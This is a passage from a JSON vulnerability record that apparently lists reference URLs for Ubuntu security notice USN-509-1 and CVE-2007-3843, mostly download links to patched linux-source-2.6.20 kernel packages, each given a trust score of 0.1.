        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/509-1/"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-sparc64_2.6.20-16.31_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3843"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server_2.6.20-16.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server_2.6.20-16.31_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-sparc64-smp_2.6.20-16.31_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc-smp_2.6.20-16.31_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc_2.6.20-16.31_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-generic_2.6.20-16.31_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.31_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server-bigiron_2.6.20-16.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.31_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-386_2.6.20-16.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-lowlatency_2.6.20-16.31_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-lowlatency_2.6.20-16.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server_2.6.20-16.31_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-kernel-devel_2.6.20-16.31_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-sparc64_2.6.20-16.31_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-lowlatency_2.6.20-16.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-sparc64-smp_2.6.20-16.31_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc-smp_2.6.20-16.31_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-lowlatency_2.6.20-16.31_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-2.6.20-16-lowlatency_2.6.20-16.31_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.31.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.31.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc_2.6.20-16.31_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server-bigiron_2.6.20-16.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc-smp_2.6.20-16.31_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
